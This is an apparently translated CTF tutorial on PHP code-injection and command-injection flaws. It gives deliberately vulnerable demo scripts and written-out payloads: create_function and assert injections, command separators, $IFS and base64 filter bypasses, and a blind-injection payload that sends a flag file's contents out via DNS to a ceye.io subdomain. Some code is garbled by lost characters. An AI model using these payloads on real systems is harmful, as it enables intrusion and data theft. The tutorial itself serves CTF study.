CTF 中的命令执行漏洞相关

Since there is no filtering for the special function portal that can be executable in the code, the user can submit malicious statements and hand them over to the server for execution.

The main reason for the success of this vulnerability attack is that the web server does not filter incoming parameters of functions such as system(), eval(), exec(), etc.

1 代码注入

1.1 相关函数

1.1.1 eval

1

2

3

4

5

?php

hilight_file(__FILE__);

$a='phpinfo();';

eval($a);

?

1.1.2 assert

1.1.3 call_user_func

You can use the is_callable function to see if it can be called back

1.1.4 call_user_func_array

1.1.5 create_function

1.1.6 preg_replace

Search for the part of the subject that matches the pattern and replace it with replacement or its execution result.

1.1.7 array_map

payload: url?a=assertb=phpinfo()

1.1.8 usort

Payload: url?1[]=phpinfo()1[]=1232=assert

1.1.9 uasort

1.1.10 ${php 代码}

1.2 DEMO

1

2

3

4

5

6

7

?php

highlight_file(__FILE__);

$price=$_GET['price'];

$code='echo $name'. 'The price of '. $price. ';';

$b=create_function('$name', $code);

$b('iPhone');

?

Payload: url?price=123;}phpinfo();/*

2 命令注入

2.1 相关函数

2.1.1 system

2.1.2 exec

2.1.3 passthru

2.1.4 shell_exec

2.1.5 `` 运算符

2.1.6 ob_start

2.2 命令执行的绕过

2.2.1 命令执行的分隔符

For example:

1

2

3

4

5

?php

highlight_file(__FILE__);

$rce='echo 123';

system($rce. $_GET[1]);

?

How to implement command execution

Line break %0a

Carriage return %0d

Continuous instruction;

Background process

Pipeline symbol |

Logic ||,

2.2.2 命令执行的分隔符

Symbol

$IFS

${IFS}

$IFS$9

%09 for url delivery

${9}

2.2.3 其它 Tips

2.2.3.1 命令拼接

1

$a=l;$b=s;$a$b

2.2.3.2 base64 编码

1

`echo cHdk | base64 -D`

2.2.3.3 substr string pos len

This expression takes out a substring with length len from the pos position. If pos or len is a non-positive integer, an empty string is returned.

echo "${PATH:0:1}" - /

1

2

3

echo '`expr\$IFS\substr\$IFS\\$(pwd)\\$IFS\1\$IFS\1`'

echo `$(expr${IFS}substr${IFS}$PWD${IFS}1${IFS}1)` - /

expr${IFS}substr${IFS}$SESSION_MANAGER${IFS}6${IFS}1{$IFS}1

2.3 命令无回显的情况

2.3.1 判断

Delay

ls|sleep(3)

HTTP Request

DNS Request

ceye.io

2.3.2 利用

Write shell (direct write, external download)

http/dns and other methods to bring it out

2.3.3 DEMO

1

2

3

4

5

6

7

8

?php

highlight_file(__FILE__);

include('where_is_flag.php');

echo 'ping:';

$ip=(string)$_GET['ping'];

$ip=str_replace('', '0.0', $ip);

shell_exec('ping '.$ip);

?

payload:

1

2

ip=;cp where_is_flag.php 1.txt

ip=`cat 1.txt|sed s/[[:space:]]//`.xx.ceye.io

Skill

cat 1.txt|sed s//[[:space:]]//g is the function of removing spaces